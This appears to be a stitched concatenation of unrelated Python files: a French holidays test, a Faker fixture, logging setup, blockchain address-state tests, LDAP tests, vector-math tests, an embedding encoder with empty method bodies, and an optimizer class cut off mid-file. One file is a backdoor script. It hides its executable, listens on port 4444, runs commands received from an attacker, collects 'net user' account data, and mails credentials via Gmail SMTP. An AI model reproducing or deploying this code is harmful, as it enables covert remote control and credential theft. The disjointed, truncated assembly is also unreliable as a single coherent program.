# Author: ryanss <ryanssdev@icloud.com> (c) 2014-2017
# dr-prodigy <maurizio.montel@gmail.com> (c) 2017-2021
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
import unittest
from datetime import date
import holidays
class TestFrance(unittest.TestCase):
def setUp(self):
self.holidays = holidays.France()
self.prov_holidays = {
prov: holidays.FR(prov=prov) for prov in holidays.FRA.PROVINCES
}
def test_2017(self):
self.assertIn(date(2017, 1, 1), self.holidays)
self.assertIn(date(2017, 4, 17), self.holidays)
self.assertIn(date(2017, 5, 1), self.holidays)
self.assertIn(date(2017, 5, 8), self.holidays)
self.assertIn(date(2017, 5, 25), self.holidays)
self.assertIn(date(2017, 6, 5), self.holidays)
self.assertIn(date(2017, 7, 14), self.holidays)
def test_others(self):
self.assertEqual(
self.holidays[date(1948, 5, 1)],
"Fête du Travail et de la Concorde sociale",
)
def test_alsace_moselle(self):
am_holidays = self.prov_holidays["Alsace-Moselle"]
self.assertIn(date(2017, 4, 14), am_holidays)
self.assertIn(date(2017, 12, 26), am_holidays)
def test_mayotte(self):
am_holidays = self.prov_holidays["Mayotte"]
self.assertIn(date(2017, 4, 27), am_holidays)
def test_wallis_et_futuna(self):
am_holidays = self.prov_holidays["Wallis-et-Futuna"]
self.assertIn(date(2017, 4, 28), am_holidays)
self.assertIn(date(2017, 7, 29), am_holidays)
def test_martinique(self):
am_holidays = self.prov_holidays["Martinique"]
self.assertIn(date(2017, 5, 22), am_holidays)
def test_guadeloupe(self):
am_holidays = self.prov_holidays["Guadeloupe"]
self.assertIn(date(2017, 5, 27), am_holidays)
self.assertIn(date(2017, 7, 21), am_holidays)
def test_guyane(self):
am_holidays = self.prov_holidays["Guyane"]
self.assertIn(date(2017, 6, 10), am_holidays)
def test_polynesie_francaise(self):
am_holidays = self.prov_holidays["Polynésie Française"]
self.assertIn(date(2017, 6, 29), am_holidays)
def test_nouvelle_caledonie(self):
am_holidays = self.prov_holidays["Nouvelle-Calédonie"]
self.assertIn(date(2017, 9, 24), am_holidays)
def test_saint_barthelemy(self):
am_holidays = self.prov_holidays["Saint-Barthélémy"]
self.assertIn(date(2017, 10, 9), am_holidays)
def test_la_reunion(self):
am_holidays = self.prov_holidays["La Réunion"]
self.assertIn(date(2017, 12, 20), am_holidays)
|
from faker import Faker
from faker.providers import BaseProvider, internet
fake = Faker('pt_BR')
data = {
'login': fake.user_name(),
'name': fake.name(),
'user_type': fake.random_elements(elements=('I', 'E'))[0],
'main_email': fake.email(),
'alternative_email': fake.email(),
'usp_email': fake.email(),
'formatted_phone': fake.phone_number(),
'wsuserid': fake.msisdn(),
'bind': '[]',
}
class Resource(BaseProvider):
def resource(self):
return {
'loginUsuario': data.get('login'),
'nomeUsuario': data.get('name'),
'tipoUsuario': data.get('user_type'),
'emailPrincipalUsuario': data.get('main_email'),
'emailAlternativoUsuario': data.get('alternative_email'),
'emailUspUsuario': data.get('usp_email'),
'numeroTelefoneFormatado': data.get('formatted_phone'),
'wsuserid': data.get('wsuserid'),
'vinculo': data.get('bind')
}
def resource_transformed(self):
return data
fake.add_provider(Resource)
|
import logging
import os
def setup_logger():
# create logger
logger = logging.getLogger("")
level = logging.INFO if os.getenv("ENV") == "prod" else logging.DEBUG
logger.setLevel(level)
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(level)
# create formatter
formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(name)s: %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
|
from urllib import request
import json
import os
import glob
def template(name, key, definition):
s = ""
s += f"# -*- mode: snippet -*-\n"
s += f"# name: {name}\n"
s += f"# key: {key}\n"
s += f"# --\n"
s += f"{definition}"
return s
def main():
file_url = "https://raw.githubusercontent.com/leanprover/vscode-lean/master/src/abbreviation/abbreviations.json"
snippets_dir = os.path.expanduser("~/.emacs.d/private/snippets/org-mode/")
file_prefix = "lean_symbols_autogen_393939"
if False:
snippets_dir = "/tmp/pytest"
if not os.path.isdir(snippets_dir):
os.mkdir(snippets_dir)
path, _ = request.urlretrieve(file_url)
with open(path, 'r') as f:
data = json.load(f)
os.remove(path)
for i,(key, definition) in enumerate(data.items()):
contents = []
contents.append(template(key, f"\{key}", definition))
contents.append(template(key, f"~\{key}", definition))
for j,c in enumerate(contents):
with open(f"{snippets_dir}/{file_prefix}-{i}-{j}-{definition}", "w") as f:
f.write(c)
if __name__ == "__main__":
main()
|
# coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
from random import shuffle
from unittest import TestCase
from mock import Mock, PropertyMock, patch
from tests.misc.helper import get_alice_xmss, get_slave_xmss, get_random_xmss
from qrl.core.misc import logger
from qrl.core import config
from qrl.core.AddressState import AddressState
logger.initialize_default()
alice = get_alice_xmss()
slave = get_slave_xmss()
class TestAddressState(TestCase):
def setUp(self):
self.addr_state = AddressState.get_default(alice.address)
def test_create_and_properties(self):
a = AddressState.create(address=alice.address, nonce=0, balance=10,
ots_bitfield=[b'\x00'] * config.dev.ots_bitfield_size,
tokens={b'010101': 100, b'020202': 200},
slave_pks_access_type={slave.pk: 1},
ots_counter=0
)
self.assertEqual(a.pbdata.address, a.address)
self.assertEqual(a.pbdata.balance, a.balance)
a.balance = 3
self.assertEqual(a.balance, 3)
self.assertEqual(a.pbdata.nonce, a.nonce)
self.assertEqual(a.pbdata.ots_bitfield, a.ots_bitfield)
self.assertEqual(a.pbdata.ots_counter, a.ots_counter)
self.assertEqual(a.pbdata.transaction_hashes, a.transaction_hashes)
self.assertEqual(a.pbdata.latticePK_list, a.latticePK_list)
self.assertEqual(a.pbdata.slave_pks_access_type, a.slave_pks_access_type)
def test_token_balance_functionality(self):
# If I update an AddressState's token balance, it should do what the function name says.
self.addr_state.update_token_balance(b'010101', 10)
self.assertEqual(self.addr_state.get_token_balance(b'010101'), 10)
self.assertTrue(self.addr_state.is_token_exists(b'010101'))
# I can call update_token_balance with a negative number to decrease the balance.
self.addr_state.update_token_balance(b'010101', -2)
self.assertEqual(self.addr_state.get_token_balance(b'010101'), 8)
# If the token balance hits 0, the token_txhash should have been pruned from the AddressState.
# And when I ask for its balance, it should return 0.
self.addr_state.update_token_balance(b'010101', -8)
self.assertFalse(self.addr_state.is_token_exists(b'010101'))
self.assertEqual(self.addr_state.get_token_balance(b'010101'), 0)
def test_nonce(self):
self.addr_state.increase_nonce()
self.assertEqual(self.addr_state.nonce, 1)
self.addr_state.increase_nonce()
self.addr_state.increase_nonce()
self.assertEqual(self.addr_state.nonce, 3)
self.addr_state.decrease_nonce()
self.addr_state.decrease_nonce()
self.assertEqual(self.addr_state.nonce, 1)
def test_nonce_negative(self):
with self.assertRaises(ValueError):
self.addr_state.decrease_nonce()
def test_slave_pks_access_type(self):
# slave_pks_access_type could take 2 values: 0 (all permission granted to slaves), 1 (only mining)
# There is no validation for the values of slave_pks_access_type.
# For now only 0 is used.
# By default all slave_pks get permission level 0
self.addr_state.add_slave_pks_access_type(slave.pk, 1)
self.assertEqual(self.addr_state.slave_pks_access_type[str(slave.pk)], 1)
def test_get_slave_permission(self):
# We haven't added slave.pk to the addr_state yet, so slave is not yet a slave of this AddressState.
self.assertEqual(self.addr_state.get_slave_permission(slave.pk), -1)
# Add slave permissions for slave.pk
self.addr_state.add_slave_pks_access_type(slave.pk, 1)
self.assertEqual(self.addr_state.get_slave_permission(slave.pk), 1)
# Remove slave permissions for slave.pk
self.addr_state.remove_slave_pks_access_type(slave.pk)
self.assertEqual(self.addr_state.get_slave_permission(slave.pk), -1)
def test_lattice_txn(self):
# Add a mock LatticeTransaction to the AddressState. It should show up in addr_state.latticePK_list
m_lattice_txn = Mock(name='mock LatticeTransaction', txhash=b'txhash', dilithium_pk=b'dilithiumPK',
kyber_pk=b'kyberPK')
self.assertEqual(len(self.addr_state.latticePK_list), 0)
self.addr_state.add_lattice_pk(m_lattice_txn)
self.assertEqual(len(self.addr_state.latticePK_list), 1)
# Add another different LatticeTransaction. addr_state.latticePK_list should now be longer.
m_lattice_txn_2 = Mock(name='mock LatticeTransaction 2', txhash=b'deadbeef', dilithium_pk=b'dilithiumPK',
kyber_pk=b'kyberPK')
self.addr_state.add_lattice_pk(m_lattice_txn_2)
self.assertEqual(len(self.addr_state.latticePK_list), 2)
# Remove the second LatticeTransaction.
self.addr_state.remove_lattice_pk(m_lattice_txn_2)
self.assertEqual(len(self.addr_state.latticePK_list), 1)
# Try to remove the second LatticeTransaction again
# The list should remain the same.
self.addr_state.remove_lattice_pk(m_lattice_txn_2)
self.assertEqual(len(self.addr_state.latticePK_list), 1)
def test_get_default_coinbase(self):
# Make sure that Coinbase AddressState gets all the coins supply by default
coinbase_addr_state = AddressState.get_default(config.dev.coinbase_address)
self.assertEqual(coinbase_addr_state.balance, int(config.dev.max_coin_supply * config.dev.shor_per_quanta))
def test_set_ots_key(self):
# If it's below config.dev.max_ots_tracking_index, use the bitfield.
self.assertEqual(b'\x00', self.addr_state.ots_bitfield[0])
self.addr_state.set_ots_key(0)
self.assertEqual(b'\x01', self.addr_state.ots_bitfield[0])
self.assertEqual(self.addr_state.ots_counter, 0)
self.assertEqual(b'\x00', self.addr_state.ots_bitfield[-1])
self.addr_state.set_ots_key(config.dev.max_ots_tracking_index - 1)
self.assertEqual(b'\x80', self.addr_state.ots_bitfield[-1])
# Start using the counter from config.dev.max_ots_tracking_index and above.
self.addr_state.set_ots_key(config.dev.max_ots_tracking_index)
self.assertEqual(self.addr_state.ots_counter, config.dev.max_ots_tracking_index)
self.addr_state.set_ots_key(config.dev.max_ots_tracking_index + 1)
self.assertEqual(self.addr_state.ots_counter, config.dev.max_ots_tracking_index + 1)
def test_unset_ots_key(self):
m_state = Mock(name='mock State')
# Set the OTS bitfield, and then try to unset it.
self.addr_state.set_ots_key(0)
self.addr_state.unset_ots_key(0, m_state)
self.assertEqual(self.addr_state.ots_bitfield[0], b'\x00')
@patch('qrl.core.AddressState.AddressState.transaction_hashes', new_callable=PropertyMock)
def test_unset_ots_key_counter(self, m_transaction_hashes):
# unset_ots_key() walks backwards through transaction_hashes and finds the last txhash that used OTS counter
# index.
# This assumes that transaction_hashes is sorted in time-ascending order, and that the offending tx
# has already been removed from transaction_hashes.
m_transaction_hashes.return_value = ["1st hash", "2nd hash", "3rd hash", "4th hash"]
m_state = Mock(name='mock State')
# The user has used some OTS bitfield indexes in a random fashion, and has two OTS counter transactions.
m_state.get_tx_metadata.side_effect = [
(Mock(name="4th hash", ots_key=357), "unused"),
(Mock(name="3rd hash", ots_key=config.dev.max_ots_tracking_index + 3), "unused"),
(Mock(name="2nd hash", ots_key=952), "unused"),
(Mock(name="1st hash", ots_key=config.dev.max_ots_tracking_index + 2), "unused")
]
self.addr_state.set_ots_key(config.dev.max_ots_tracking_index + 4) # 8196
# You must remove the txhash that uses index 8196 from transaction_hashes BEFORE calling this function, as it
# will walk backwards through the transaction_hashes
self.addr_state.unset_ots_key(config.dev.max_ots_tracking_index + 4, m_state)
self.assertEqual(self.addr_state.ots_counter, config.dev.max_ots_tracking_index + 3)
@patch('qrl.core.AddressState.AddressState.transaction_hashes', new_callable=PropertyMock)
def test_unset_ots_key_counter_unsorted_transaction_hashes(self, m_transaction_hashes):
# unset_ots_key() ends up with the wrong OTS counter index if transaction_hashes is not properly sorted.
m_transaction_hashes.return_value = ["1st hash", "2nd hash", "3rd hash", "4th hash"]
m_state = Mock(name='mock State')
# The user has used some OTS bitfield indexes in a random fashion, and has two OTS counter transactions.
m_state.get_tx_metadata.side_effect = [
(Mock(name="4th hash", ots_key=357), "unused"),
(Mock(name="3rd hash", ots_key=config.dev.max_ots_tracking_index + 2), "unused"),
(Mock(name="2nd hash", ots_key=952), "unused"),
(Mock(name="1st hash", ots_key=config.dev.max_ots_tracking_index + 3), "unused")
][-1::-1] # reversing the order, as it will be called in reverse order by unset_ots_key
self.addr_state.set_ots_key(config.dev.max_ots_tracking_index + 4) # 8196
self.addr_state.unset_ots_key(config.dev.max_ots_tracking_index + 4, m_state)
# In a perfect world, unset_ots_key should have found "1st hash" and used its ots_key
# But it found "3rd hash" and used its ots key, thus FAIL.
self.assertEqual(self.addr_state.ots_counter, config.dev.max_ots_tracking_index + 3)
def test_ots_key_validation(self):
random_xmss = get_random_xmss(xmss_height=4)
addr = AddressState.get_default(random_xmss.address)
ots_indexes = list(range(0, 2 ** random_xmss.height))
shuffle(ots_indexes)
for i in ots_indexes:
if i < config.dev.max_ots_tracking_index:
self.assertFalse(addr.ots_key_reuse(i))
else:
result = addr.ots_key_reuse(i)
if i > addr.ots_counter:
self.assertFalse(result)
else:
self.assertTrue(result)
addr.set_ots_key(i)
self.assertTrue(addr.ots_key_reuse(i))
def test_ots_key_reuse_counter(self):
# If the ots counter is 8193, that automatically means index 8192 is used.
self.addr_state.set_ots_key(config.dev.max_ots_tracking_index + 1)
self.assertTrue(self.addr_state.ots_key_reuse(config.dev.max_ots_tracking_index))
# If the ots counter is 8193, that means 8194 and above are not used.
self.assertFalse(self.addr_state.ots_key_reuse(config.dev.max_ots_tracking_index + 2))
def test_serialize(self):
# Simply test that serialize() works and you can deserialize from it.
output = self.addr_state.serialize()
another_addr_state = AddressState(protobuf_block=output)
self.assertIsInstance(another_addr_state, AddressState)
def test_address_is_valid(self):
self.assertTrue(AddressState.address_is_valid(alice.address))
self.assertFalse(AddressState.address_is_valid(b'fake address'))
|
import ldap
from awx.sso.backends import LDAPSettings
from awx.sso.validators import validate_ldap_filter
def test_ldap_default_settings(mocker):
from_db = mocker.Mock(**{'order_by.return_value': []})
with mocker.patch('awx.conf.models.Setting.objects.filter', return_value=from_db):
settings = LDAPSettings()
assert settings.ORGANIZATION_MAP == {}
assert settings.TEAM_MAP == {}
def test_ldap_default_network_timeout(mocker):
from_db = mocker.Mock(**{'order_by.return_value': []})
with mocker.patch('awx.conf.models.Setting.objects.filter', return_value=from_db):
settings = LDAPSettings()
assert settings.CONNECTION_OPTIONS == {
ldap.OPT_REFERRALS: 0,
ldap.OPT_NETWORK_TIMEOUT: 30
}
def test_ldap_filter_validator():
validate_ldap_filter('(test-uid=%(user)s)', with_user=True)
|
#!/usr/bin/env python
__author__ = "Kharim Mchatta"
#To connect to it upload the script on the victim server
#On your attack machine run the command below:
#nc target-ip target-port
#############################################
# Simple Reverse Listener #
# by Kharim Mchatta #
#############################################
##############################################
# Disclaimer: This code should be used for #
# Education Purpose Only. #
# Any Malicious use of the code would not #
# hold the author responsible. #
##############################################
# -*- coding: utf-8 -*-
import socket, os, sys, subprocess, smtplib, re
hide = 'attrib +s +h server.exe' #data hiding Technique
os.system(hide)
ip = '192.168.1.14'
port = 4444
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((ip, port))
server.listen(5)
print('[*]listening to %s:%d' % (ip, port))
client, addr = server.accept()
print('[*]connected to %s:%d' % (ip, port))
os.chdir('C:\\') #the program to go to drive C: directly
while True:
# recieve data from the client
data = str(client.recv(8192))
data = data.strip()
if data[:2].decode("utf-8") == 'cd':
os.chdir(data[3:].decode("utf-8"))
elif data.strip() == "exit":
client.sendall("cheers")
client.close()
sys.exit(0)
else:
# seneding output to the attacker
user, output = os.popen4(data)
client.sendall(output.read() + str(os.getcwd()) + '>')
DEVNULL = open(os.devnull, 'wb')
#sending all user account to the hackers email
mail = "dummyd054@gmail.com" #replace with your email address
password = "xxxxxxx" #type your password
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(mail, password)
server.sendmail(mail, mail, password)
user = "net user" #collecting system user account
profile = subprocess.check_output(user, shell=True, stderr=DEVNULL, stdin=DEVNULL)
profiles = re.findall(br"(?:Profile\s*:\s)(.*)", profile)
os.system(user)
output = ""
for profile in profiles:
user = 'net user' + 'name=' + '"' + profile.decode('utf-8')
new = subprocess.check_output(user, shell=True, stderr=DEVNULL, stdin=DEVNULL)
output = output + new.decode('utf-8')
server.quit()
|
from IPython.core.magic import magics_class, line_cell_magic, Magics
from IPython.core.magic import needs_local_scope
from IPython.display import display, Markdown
@magics_class
class fstringMagic(Magics):
def __init__(self, shell, cache_display_data=False):
super(fstringMagic, self).__init__(shell)
@line_cell_magic
def stringformat(self, line, cell):
"""Treat code cell content as f-string."""
return display(Markdown(cell.format(**self.shell.user_ns)))
@line_cell_magic
@needs_local_scope
def fstring(self, line, cell, local_ns):
"""Treat code cell content as f-string."""
return display(Markdown(eval("f'''" + cell + "'''", local_ns)))
|
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
from transformer import Embedding
import re
def GraphEmbedding(vocab, embedding_dim, pretrained_file=None, amr=False, dump_file=None):
if pretrained_file is None:
return Embedding(vocab.size, embedding_dim, vocab.padding_idx)
tokens_to_keep = set()
for idx in range(vocab.size):
token = vocab.idx2token(idx)
# TODO: Is there a better way to do this? Currently we have a very specific 'amr' param.
if amr:
token = re.sub(r'-\d\d$', '', token)
tokens_to_keep.add(token)
embeddings = {}
if dump_file is not None:
fo = open(dump_file, 'w', encoding='utf8')
with open(pretrained_file, encoding='utf8') as embeddings_file:
for line in embeddings_file.readlines():
fields = line.rstrip().split(' ')
if len(fields) - 1 != embedding_dim:
continue
token = fields[0]
if token in tokens_to_keep:
if dump_file is not None:
fo.write(line)
vector = np.asarray(fields[1:], dtype='float32')
embeddings[token] = vector
if dump_file is not None:
fo.close()
all_embeddings = np.asarray(list(embeddings.values()))
print ('pretrained', all_embeddings.shape)
embeddings_mean = float(np.mean(all_embeddings))
embeddings_std = float(np.std(all_embeddings))
# Now we initialize the weight matrix for an embedding layer, starting with random vectors,
# then filling in the word vectors we just read.
embedding_matrix = torch.FloatTensor(vocab.size, embedding_dim).normal_(embeddings_mean,
embeddings_std)
for i in range(vocab.size):
token = vocab.idx2token(i)
# If we don't have a pre-trained vector for this word, we'll just leave this row alone,
# so the word has a random initialization.
if token in embeddings:
embedding_matrix[i] = torch.FloatTensor(embeddings[token])
else:
if amr:
normalized_token = re.sub(r'-\d\d$', '', token)
if normalized_token in embeddings:
embedding_matrix[i] = torch.FloatTensor(embeddings[normalized_token])
embedding_matrix[vocab.padding_idx].fill_(0.)
return nn.Embedding.from_pretrained(embedding_matrix, freeze=False)
class RelationEncoder(nn.Module):
def __init__(self, vocab, rel_dim, embed_dim, hidden_size, num_layers, dropout, bidirectional=True):
def forward(self, src_tokens, src_lengths):
class TokenEncoder(nn.Module):
def __init__(self, token_vocab, char_vocab, char_dim, token_dim, embed_dim, filters, char2token_dim, dropout, pretrained_file=None):
def forward(self, token_input, char_input):
class CNNEncoder(nn.Module):
def __init__(self, filters, input_dim, output_dim, highway_layers=1):
super(CNNEncoder, self).__init__()
self.convolutions = nn.ModuleList()
for width, out_c in filters:
self.convolutions.append(nn.Conv1d(input_dim, out_c, kernel_size=width))
final_dim = sum(f[1] for f in filters)
self.highway = Highway(final_dim, highway_layers)
self.out_proj = nn.Linear(final_dim, output_dim)
self.reset_parameters()
def reset_parameters(self):
nn.init.normal_(self.out_proj.weight, std=0.02)
nn.init.constant_(self.out_proj.bias, 0.)
def forward(self, input):
# input: batch_size x seq_len x input_dim
x = input.transpose(1, 2)
conv_result = []
for i, conv in enumerate(self.convolutions):
y = conv(x)
y, _ = torch.max(y, -1)
y = F.relu(y)
conv_result.append(y)
conv_result = torch.cat(conv_result, dim=-1)
conv_result = self.highway(conv_result)
return self.out_proj(conv_result) # batch_size x output_dim
|
"""Unit tests for `OMMBV.vector`."""
import numpy as np
import pytest
import OMMBV
from OMMBV import sources
from OMMBV.tests.test_core import gen_data_fixed_alt
class TestVector(object):
"""Unit tests for `OMMBV.vector`."""
def setup(self):
"""Setup test environment before each function."""
# Locations to perform tests at
self.lats, self.longs, self.alts = gen_data_fixed_alt(550.)
return
def teardown(self):
"""Clean up test environment after each function."""
del self.lats, self.longs, self.alts
return
@pytest.mark.parametrize("input,output",
[([0., 1., 0., 0., 0.], [1.0, 0., 0.]),
([1., 0., 0., 0., 0.], [0., 0., 1.]),
([0., 0., 1., 0., 0.], [0., 1., 0.]),
([1., 0., 0., 0., 90.], [-1., 0., 0.]),
([0., 1., 0., 0., 90.], [0., 0., 1.]),
([0., 0., 1., 0., 90.], [0., 1., 0.]),
([0., 1., 0., 0., 180.], [-1., 0., 0.]),
([1., 0., 0., 0., 180.], [0., 0., -1.]),
([0., 0., 1., 0., 180.], [0., 1., 0.]),
([0., 1., 0., 45., 0.], [1., 0., 0.]),
([1., 0., 0., 45., 0.], [0., -np.cos(np.pi / 4),
np.cos(np.pi / 4)]),
([0., 0., 1., 45., 0.], [0., np.cos(np.pi / 4),
np.cos(np.pi / 4)])])
def test_basic_ecef_to_enu_rotations(self, input, output):
"""Test ECEF to ENU Vector Rotations."""
ve, vn, vu = OMMBV.vector.ecef_to_enu(*input)
np.testing.assert_allclose(ve, output[0], atol=1E-9)
np.testing.assert_allclose(vn, output[1], atol=1E-9)
np.testing.assert_allclose(vu, output[2], atol=1E-9)
return
@pytest.mark.parametrize("input,output", [([1., 0., 0., 0., 0.],
[0., 1., 0.]),
([0., 0., 1., 0., 0.],
[1., 0., 0.]),
([0., 1., 0., 0., 0.],
[0., 0., 1.]),
([1., 0., 0., 0., 90.],
[-1., 0., 0.]),
([0., 0., 1., 0., 90.],
[0., 1., 0.]),
([0., 1., 0., 0., 90.],
[0., 0., 1.]),
([1., 0., 0., 0., 180.],
[0., -1., 0.]),
([0., 0., 1., 0., 180.],
[-1., 0., 0.]),
([0., 1., 0., 0., 180.],
[0., 0., 1.])])
def test_basic_enu_to_ecef_rotations(self, input, output):
"""Test ENU to ECEF rotations."""
vx, vy, vz = OMMBV.vector.enu_to_ecef(*input)
np.testing.assert_allclose(vx, output[0], atol=1E-9)
np.testing.assert_allclose(vy, output[1], atol=1E-9)
np.testing.assert_allclose(vz, output[2], atol=1E-9)
return
def test_ecef_to_enu_back_to_ecef(self):
"""Test ECEF-ENU-ECEF."""
vx = 0.9
vy = 0.1
vz = np.sqrt(1. - vx ** 2 + vy ** 2)
for lat, lon, alt in zip(self.lats, self.longs, self.alts):
vxx, vyy, vzz = OMMBV.vector.ecef_to_enu(vx, vy, vz, lat,
lon)
vxx, vyy, vzz = OMMBV.vector.enu_to_ecef(vxx, vyy, vzz, lat,
lon)
np.testing.assert_allclose(vx, vxx, atol=1E-9)
np.testing.assert_allclose(vy, vyy, atol=1E-9)
np.testing.assert_allclose(vz, vzz, atol=1E-9)
return
def test_enu_to_ecef_back_to_enu(self):
"""Test ENU-ECEF-ENU."""
vx = 0.9
vy = 0.1
vz = np.sqrt(1. - vx ** 2 + vy ** 2)
for lat, lon, alt in zip(self.lats, self.longs, self.alts):
vxx, vyy, vzz = OMMBV.vector.enu_to_ecef(vx, vy, vz, lat,
lon)
vxx, vyy, vzz = OMMBV.vector.ecef_to_enu(vxx, vyy, vzz, lat,
lon)
np.testing.assert_allclose(vx, vxx, atol=1E-9)
np.testing.assert_allclose(vy, vyy, atol=1E-9)
np.testing.assert_allclose(vz, vzz, atol=1E-9)
return
def test_igrf_end_to_ecef_back_to_end(self):
"""Check consistency ENU-ECEF and IGRF implementation."""
vx = 0.9
vy = 0.1
vz = np.sqrt(1. - vx ** 2 + vy ** 2)
vz = -vz
for lat, lon, alt in zip(self.lats, self.longs, self.alts):
# Input here is co-latitude, not latitude.
# Inputs to fortran are in radians.
vxx, vyy, vzz = sources.end_vector_to_ecef(vx, vy, vz,
np.deg2rad(90. - lat),
np.deg2rad(lon))
vx2, vy2, vz2 = OMMBV.vector.enu_to_ecef(vx, vy, -vz, lat,
lon)
np.testing.assert_allclose(vxx, vx2, atol=1E-9)
np.testing.assert_allclose(vyy, vy2, atol=1E-9)
np.testing.assert_allclose(vzz, vz2, atol=1E-9)
vxx, vyy, vzz = OMMBV.vector.ecef_to_enu(vxx, vyy, vzz, lat,
lon)
# Convert upward component back to down
vzz = -vzz
# Compare original inputs to outputs
np.testing.assert_allclose(vx, vxx, atol=1E-9)
np.testing.assert_allclose(vy, vyy, atol=1E-9)
np.testing.assert_allclose(vz, vzz, atol=1E-9)
return
@pytest.mark.parametrize("input", [[22., 36., 42.],
[np.array([1., 2., 3.]),
np.array([4., 5., 6.]),
np.array([7., 8., 9.])]])
def test_normalize(self, input):
"""Test `OMMBV.vector.normalize` normalizes."""
x, y, z = OMMBV.vector.normalize(*input)
# Ensure unit magnitude
unit_mag = np.sqrt(x**2 + y**2 + z**2)
np.testing.assert_allclose(unit_mag, 1, atol=1E-9)
# Check against each component
mag = np.sqrt(input[0]**2 + input[1]**2 + input[2]**2)
np.testing.assert_allclose(input[0], mag * x, atol=1E-9)
np.testing.assert_allclose(input[1], mag * y, atol=1E-9)
np.testing.assert_allclose(input[2], mag * z, atol=1E-9)
return
@pytest.mark.parametrize("input1,input2,output",([[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]],
[[np.ones(3), np.zeros(3),
np.zeros(3)],
[np.zeros(3), np.ones(3),
np.zeros(3)],
[np.zeros(3), np.zeros(3),
np.ones(3)]]))
def test_cross_product(self, input1, input2, output):
"""Test `OMMBV.vector.cross_product`."""
x, y, z = OMMBV.vector.cross_product(*input1, *input2)
np.testing.assert_allclose(output[0], x, atol=1E-9)
np.testing.assert_allclose(output[1], y, atol=1E-9)
np.testing.assert_allclose(output[2], z, atol=1E-9)
return
@pytest.mark.parametrize("input_vec,input_basis,output", [([1., 0., 0],
[0., 1., 0.,
-1., 0., 0.,
0., 0., 1.],
[0., -1., 0.])])
def test_project_onto_basis(self, input_vec, input_basis, output):
"""Test `OMMBV.vector.project_onto_basis`."""
x, y, z = OMMBV.vector.project_onto_basis(*input_vec, *input_basis)
np.testing.assert_allclose(output[0], x, atol=1E-9)
np.testing.assert_allclose(output[1], y, atol=1E-9)
np.testing.assert_allclose(output[2], z, atol=1E-9)
return
|
"""Lion Optimization Algorithm.
"""
import copy
import itertools
import numpy as np
import opytimizer.math.distribution as d
import opytimizer.math.general as g
import opytimizer.math.random as r
import opytimizer.utils.constant as c
import opytimizer.utils.exception as e
import opytimizer.utils.logging as l
from opytimizer.core import Agent, Optimizer
logger = l.get_logger(__name__)
class Lion(Agent):
"""A Lion class complements its inherited parent with additional information neeeded by
the Lion Optimization Algorithm.
"""
def __init__(self, n_variables, n_dimensions, lower_bound, upper_bound, position, fit):
"""Initialization method.
Args:
n_variables (int): Number of decision variables.
n_dimensions (int): Number of dimensions.
lower_bound (list, tuple, np.array): Minimum possible values.
upper_bound (list, tuple, np.array): Maximum possible values.
position (np.array): Position array.
fit (float): Fitness value.
"""
# Overrides its parent class with the receiving params
super(Lion, self).__init__(n_variables, n_dimensions, lower_bound, upper_bound)
# Copies the current position and fitness to overrided object
self.position = copy.deepcopy(position)
self.fit = copy.deepcopy(fit)
# Best position
self.best_position = copy.deepcopy(position)
# Previous fitness
self.p_fit = copy.deepcopy(fit)
# Whether lion is nomad or not
self.nomad = False
# Whether lion is female or not
self.female = False
# Index of pride
self.pride = 0
# Index of hunting group
self.group = 0
@property
def best_position(self):
"""np.array: N-dimensional array of best positions.
"""
return self._best_position
@best_position.setter
def best_position(self, best_position):
if not isinstance(best_position, np.ndarray):
raise e.TypeError('`best_position` should be a numpy array')
self._best_position = best_position
@property
def p_fit(self):
"""float: Previous fitness value.
"""
return self._p_fit
@p_fit.setter
def p_fit(self, p_fit):
if not isinstance(p_fit, (float, int, np.int32, np.int64)):
raise e.TypeError('`p_fit` should be a float or integer')
self._p_fit = p_fit
@property
def nomad(self):
"""bool: Whether lion is nomad or not.
"""
return self._nomad
@nomad.setter
def nomad(self, nomad):
if not isinstance(nomad, bool):
raise e.TypeError('`nomad` should be a boolean')
self._nomad = nomad
@property
def female(self):
"""bool: Whether lion is female or not.
"""
return self._female
@female.setter
def female(self, female):
if not isinstance(female, bool):
raise e.TypeError('`female` should be a boolean')
self._female = female
@property
def pride(self):
"""int: Index of pride.
"""
return self._pride
@pride.setter
def pride(self, pride):
if not isinstance(pride, int):
raise e.TypeError('`pride` should be an integer')
if pride < 0:
raise e.ValueError('`pride` should be > 0')
self._pride = pride
@property
def group(self):
"""int: Index of hunting group.
"""
return self._group
@group.setter
def group(self, group):
if not isinstance(group, int):
raise e.TypeError('`group` should be an integer')
if group < 0:
raise e.ValueError('`group` should be > 0')
self._group = group
class LOA(Optimizer):
"""An LOA class, inherited from Optimizer.
This is the designed class to define LOA-related
variables and methods.
References:
M. Yazdani and F. Jolai. Lion Optimization Algorithm (LOA): A nature-inspired metaheuristic algorithm.
Journal of Computational Design and Engineering (2016).
"""
def __init__(self, params=None):
"""Initialization method.
Args:
params (dict): Contains key-value parameters to the meta-heuristics.
"""
logger.info('Overriding class: Optimizer -> LOA.')
# Overrides its parent class with the receiving params
super(LOA, self).__init__()
# Percentage of nomad lions
self.N = 0.2
# Number of prides
self.P = 4
# Percentage of female lions
self.S = 0.8
# Percentage of roaming lions
self.R = 0.2
# Immigrate rate
self.I = 0.4
# Mating probability
self.Ma = 0.3
# Mutation probability
self.Mu = 0.2
# Builds the class
self.build(params)
logger.info('Class overrided.')
@property
def N(self):
"""float: Percentage of nomad lions.
"""
return self._N
@N.setter
def N(self, N):
if not isinstance(N, (float, int)):
raise e.TypeError('`N` should be a float or integer')
if N < 0 or N > 1:
raise e.ValueError('`N` should be between 0 and 1')
self._N = N
@property
def P(self):
"""int: Number of prides.
"""
return self._P
@P.setter
def P(self, P):
if not isinstance(P, int):
raise e.TypeError('`P` should be an integer')
if P <= 0:
raise e.ValueError('`P` should be > 0')
self._P = P
@property
def S(self):
"""float: Percentage of female lions.
"""
return self._S
@S.setter
def S(self, S):
if not isinstance(S, (float, int)):
raise e.TypeError('`S` should be a float or integer')
if S < 0 or S > 1:
